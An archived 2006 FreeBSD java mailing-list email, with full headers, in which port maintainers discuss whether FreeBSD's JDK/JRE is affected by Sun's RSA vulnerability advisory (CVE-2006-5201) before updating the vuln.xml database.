From owner-freebsd-java@FreeBSD.ORG  Fri Oct 13 19:26:22 2006
Return-Path: <owner-freebsd-java@FreeBSD.ORG>
X-Original-To: java@FreeBSD.org
Delivered-To: freebsd-java@FreeBSD.ORG
Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125])
	by hub.freebsd.org (Postfix) with ESMTP id 203E816A412
	for <java@FreeBSD.org>; Fri, 13 Oct 2006 19:26:22 +0000 (UTC)
	(envelope-from infofarmer@gmail.com)
Received: from hu-out-0506.google.com (hu-out-0506.google.com [72.14.214.224])
	by mx1.FreeBSD.org (Postfix) with ESMTP id 0223043D92
	for <java@FreeBSD.org>; Fri, 13 Oct 2006 19:26:16 +0000 (GMT)
	(envelope-from infofarmer@gmail.com)
Received: by hu-out-0506.google.com with SMTP id 22so468674hug
	for <java@FreeBSD.org>; Fri, 13 Oct 2006 12:26:15 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com;
	h=received:message-id:date:from:sender:to:subject:cc:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references:x-google-sender-auth;
	b=KJQAomyeSLNLrx6smwDQMVMkO/gJmRQBizDP5DXep6XMxlPKW1tkvEqNJKhDonMV60yFLb3Kp6WA08XzbDTFmCl0aKB7f4uzAGbVoGtt2aO6zGfRXPux7zGhzwlcZhabxS+Td/BP6Jy86Gud0cnYHg9oQDSCIHNzdUCOF4KNrSI=
Received: by 10.78.201.15 with SMTP id y15mr4101995huf;
	Fri, 13 Oct 2006 12:18:59 -0700 (PDT)
Received: by 10.78.167.16 with HTTP; Fri, 13 Oct 2006 12:18:53 -0700 (PDT)
Message-ID: <cb5206420610131218n23274729u600772a1faef34fb@mail.gmail.com>
Date: Fri, 13 Oct 2006 23:18:53 +0400
From: "Andrew Pantyukhin" <infofarmer@FreeBSD.org>
Sender: infofarmer@gmail.com
To: "Greg Lewis" <glewis@FreeBSD.org>, java@FreeBSD.org
In-Reply-To: <20061004181113.GB1008@zaphod.nitro.dk>
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
References: <cb5206420610040941i33d9cb6j98c0beb4e21dc415@mail.gmail.com>
	<20061004181113.GB1008@zaphod.nitro.dk>
X-Google-Sender-Auth: 8910d5ff322548bc
Cc: "Simon L. Nielsen" <simon@freebsd.org>, secteam@freebsd.org
Subject: Re: JDK/JRE RSA vulnerability
X-BeenThere: freebsd-java@freebsd.org
X-Mailman-Version: 2.1.5
Precedence: list
List-Id: Porting Java to FreeBSD <freebsd-java.freebsd.org>
List-Unsubscribe: <http://lists.freebsd.org/mailman/listinfo/freebsd-java>,
	<mailto:freebsd-java-request@freebsd.org?subject=unsubscribe>
List-Archive: <http://lists.freebsd.org/pipermail/freebsd-java>
List-Post: <mailto:freebsd-java@freebsd.org>
List-Help: <mailto:freebsd-java-request@freebsd.org?subject=help>
List-Subscribe: <http://lists.freebsd.org/mailman/listinfo/freebsd-java>,
	<mailto:freebsd-java-request@freebsd.org?subject=subscribe>
X-List-Received-Date: Fri, 13 Oct 2006 19:26:22 -0000

On 10/4/06, Simon L. Nielsen <simon@freebsd.org> wrote:
> On 2006.10.04 20:41:34 +0400, Andrew Pantyukhin wrote:
> > Please review the following patch to vuln.xml:
> >
> > http://people.freebsd.org/~sat/diffs/jdk1509.diff
>
> Are you sure that the JDK/JRE for FreeBSD is actually vulnerable?  On
> some OS'es which don't support cryptographic operations by default
> (e.g. Windows) crypto libs are bundled with the program, but OS
> suplied libs are used on the OS'es which has them.  I don't know if
> this is the case of JDK/JRE but it should probably be checked first.
> Could you poke the java people (e.g. glewis AFAIR) to check?
>
> As a sitenote, the Secunia advisory doesn't contain anything which
> isn't on Sun's page, so much better to use the info directly from Sun.

Could you please take a look and tell us if we're affected by
one or more of these advisories:

http://sunsolve.sun.com/search/document.do?assetkey=1-26-102648-1
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5201
http://secunia.com/advisories/22204/

I'm almost sure linux versions are vulnerable, but as for
native versions (both certified and not), it's unclear.

Thank you!